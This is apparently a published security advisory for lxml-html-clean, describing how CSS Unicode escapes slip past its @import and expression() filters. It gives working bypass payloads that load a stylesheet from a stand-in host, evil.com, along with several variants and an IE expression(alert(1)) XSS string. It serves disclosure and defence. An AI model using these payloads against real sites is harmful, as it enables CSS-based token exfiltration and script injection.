lxml-html-clean has CSS @import Filter Bypass via Unicode Escapes

Summary

The _has_sneaky_javascript() method strips backslashes, rather than decoding them, before checking for dangerous CSS keywords. As a result, CSS Unicode escape sequences bypass the @import and expression() filters, which allows external CSS loading, or XSS in older browsers.

Details

The root cause is located in clean.py (around line 594):

style = style.replace('\\', '')

This transformation turns a payload such as @\69mport into @69mport, which does not match the blocklisted keyword @import, so the check passes and the original style text is emitted unchanged. Browser CSS parsers, however, decode \69 as the character 'i' (code point U+0069), as described in section 4.3.7 of the CSS Syntax specification, and therefore interpret @\69mport as a valid @import rule.

The same root cause bypasses expression() detection: \65xpression(alert(1)) passes through the filter unchanged (exploitable in Internet Explorer only).
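
The mismatch can be reproduced without the library. The sketch below is a simplified stand-in, not the actual code in clean.py: strip_then_check is a hypothetical helper that mirrors only the order of operations described above (remove backslashes, then search for the keywords), and the payload list is illustrative.

```python
def strip_then_check(style: str) -> bool:
    """Return True if the simplified filter would flag the style text."""
    # Same order as described above: drop backslashes first, then search.
    stripped = style.replace("\\", "").lower()
    return "@import" in stripped or "expression(" in stripped


payloads = [
    '@import url("http://evil.com/x.css");',     # plain keyword
    '@\\69mport url("http://evil.com/x.css");',  # escaped "i"
    "width: \\65xpression(alert(1));",           # escaped "e"
]

for payload in payloads:
    # Print the verdict next to the string the keyword search actually sees.
    print(strip_then_check(payload), payload.replace("\\", ""))
```

Only the first payload is flagged. For the other two, the keyword search sees @69mport and 65xpression(, neither of which contains a blocked keyword.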

PoC

from lxml_html_clean import clean_html

# Normal @import is correctly blocked:
# clean_html('<style>@import url("http://evil.com/x.css");</style>')
# Output: <div><style> url("http://evil.com/x.css");</style></div>

# Unicode escape bypass:
result = clean_html('<style>@\\69mport url("http://evil.com/x.css");</style>')
print(result)
# Output: <div><style>@\69mport url("http://evil.com/x.css");</style></div>

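When this output is rendered, the browser loads the external CSS. Variants such as @\0069mport (zero-padded), @\69 mport (trailing space, which the parser consumes as part of the escape), and @\49mport (uppercase I, accepted because at-keywords are case-insensitive) also work.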
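
To see why every variant is equivalent from the browser's point of view, the escapes can be decoded roughly the way a CSS tokenizer does. The following is a minimal sketch under stated assumptions: decode_css_escapes is a hypothetical helper, not part of lxml_html_clean, and it approximates the escape rules (1 to 6 hex digits plus one optional whitespace character) without handling every edge case of the specification. It is not presented as the upstream fix.

```python
import re

# Backslash followed by 1-6 hex digits and one optional whitespace character,
# or a backslash followed by any single non-newline character.
_CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|([^\n\r\f]))")


def decode_css_escapes(style: str) -> str:
    """Approximate how a CSS tokenizer resolves backslash escapes."""

    def _replace(match: re.Match) -> str:
        hex_digits, literal = match.group(1), match.group(2)
        if hex_digits is None:
            # Non-hex escape such as "\(": keep the escaped character itself.
            return literal
        code_point = int(hex_digits, 16)
        # Null, surrogates, and out-of-range values become U+FFFD.
        if code_point == 0 or code_point > 0x10FFFF or 0xD800 <= code_point <= 0xDFFF:
            return "\ufffd"
        return chr(code_point)

    return _CSS_ESCAPE.sub(_replace, style)


variants = ["@\\69mport", "@\\0069mport", "@\\69 mport", "@\\49mport"]
# Lowercase after decoding, since at-keywords are matched case-insensitively.
decoded = [decode_css_escapes(v).lower() for v in variants]
print(decoded)
```

Each variant decodes to @import, which is the string a keyword check would need to inspect in order to catch these payloads.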

Impact

External CSS loading enables data exfiltration via attribute selectors (e.g., reading CSRF tokens), UI redressing, and phishing. In older browsers (IE), this allows for full XSS via expression().

References

frenzymadness published to fedora-python/lxml_html_clean Mar 2, 2026

Published to the GitHub Advisory Database Mar 2, 2026

Reviewed Mar 2, 2026

Published by the National Vulnerability Database Mar 5, 2026

Last updated Mar 5, 2026

Weaknesses

Improper Encoding or Escaping of Output
